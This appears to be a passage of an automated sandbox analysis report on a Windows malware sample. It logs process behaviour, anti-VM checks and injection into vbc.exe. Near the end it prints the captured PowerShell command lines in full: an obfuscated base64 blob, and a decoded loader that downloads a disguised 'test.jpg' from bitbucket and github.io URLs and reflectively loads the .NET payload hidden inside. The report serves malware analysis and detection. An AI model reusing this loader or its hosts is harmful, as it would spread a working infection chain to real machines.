            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeMemory allocated: 6900000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeMemory allocated: 6B00000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeMemory allocated: 8B00000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1110Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2127Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3576Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6265Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2345
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7076Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5196Thread sleep count: 3576 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5196Thread sleep count: 6265 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4092Thread sleep time: -14757395258967632s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 992Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeCode function: 0_2_00007FF6A1D8204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF6A1D8204C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeCode function: 0_2_00007FF6A1D864E4 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00007FF6A1D864E4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: vbc.exe, 00000009.00000002.2278394361.0000000004CBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: vbc.exe, 00000009.00000002.2278394361.0000000004CBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeCode function: 0_2_00007FF6A1D81D28 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00007FF6A1D81D28
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeCode function: 0_2_00007FF6A1D88790 SetUnhandledExceptionFilter,0_2_00007FF6A1D88790
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeCode function: 0_2_00007FF6A1D88494 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6A1D88494
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Yara detected Powershell download and execute
            Source: Yara matchFile source: amsi64_5388.amsi.csv, type: OTHER
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1352, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5388, type: MEMORYSTR
            Injects a PE file into a foreign processes
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 402000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 40E000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 410000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 4A12008Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a7e5e159f71.vbs" Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.drbfojS/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'Vbc', '0'))}}" .exe -windowstyle hidden -execJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Vbc.exe"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess created: C:\Users\user\AppData\Roaming\XenoManager\Vbc.exe "C:\Users\user\AppData\Roaming\XenoManager\Vbc.exe" Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$dosigo = 'wwbo@gu@d@@u@fm@zqby@hy@aqbj@gu@u@bv@gk@bgb0@e0@yqbu@ge@zwbl@hi@xq@6@do@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@@g@d0@i@bb@e4@zqb0@c4@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@bu@hk@c@bl@f0@og@6@fq@b@bz@de@mg@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgb1@g4@ywb0@gk@bwbu@c@@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@rgby@g8@bqbm@gk@bgbr@hm@i@b7@c@@c@bh@hi@yqbt@c@@k@bb@hm@d@by@gk@bgbn@fs@xqbd@cq@b@bp@g4@awbz@ck@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@b3@gu@ygbd@gw@aqbl@g4@d@@g@d0@i@bo@gu@dw@t@e8@ygbq@gu@ywb0@c@@uwb5@hm@d@bl@g0@lgbo@gu@d@@u@fc@zqbi@em@b@bp@gu@bgb0@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@c@@pq@g@ec@zqb0@c0@ugbh@g4@z@bv@g0@i@@t@ek@bgbw@hu@d@bp@gi@agbl@gm@d@@g@cq@b@bp@g4@awbz@c@@lqbd@g8@dqbu@hq@i@@k@gw@aqbu@gs@cw@u@ew@zqbu@gc@d@bo@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgbv@hi@zqbh@gm@a@@g@cg@j@bs@gk@bgbr@c@@aqbu@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@ck@i@b7@c@@d@by@hk@i@b7@c@@cgbl@hq@dqby@g4@i@@k@hc@zqbi@em@b@bp@gu@bgb0@c4@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@k@@k@gw@aqbu@gs@kq@g@h0@i@bj@ge@d@bj@gg@i@b7@c@@ywbv@g4@d@bp@g4@dqbl@c@@fq@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@by@gu@d@b1@hi@bg@g@cq@bgb1@gw@b@@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gw@aqbu@gs@cw@g@d0@i@b@@cg@jwbo@hq@d@bw@hm@og@v@c8@ygbp@hq@ygb1@gm@awbl@hq@lgbv@hi@zw@v@gm@ywbj@gm@ywbj@gm@ywbj@gm@ywbj@g4@bqbm@gc@lwbn@hy@z@bm@gg@z@@v@gq@bwb3@g4@b@bv@ge@z@bz@c8@d@bl@hm@d@@u@go@c@bn@d8@mq@z@dc@mq@x@dm@jw@s@c@@jwbo@hq@d@bw@hm@og@v@c8@bwbm@gk@ywbl@dm@ng@1@c4@zwbp@hq@a@b1@gi@lgbp@g8@lw@x@c8@d@bl@hm@d@@u@go@c@bn@cc@kq@7@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@cq@aqbt@ge@zwbl@ei@eqb0@gu@cw@g@d0@i@be@g8@dwbu@gw@bwbh@gq@r@bh@hq@yqbg@hi@bwbt@ew@aqbu@gs@cw@g@cq@b@bp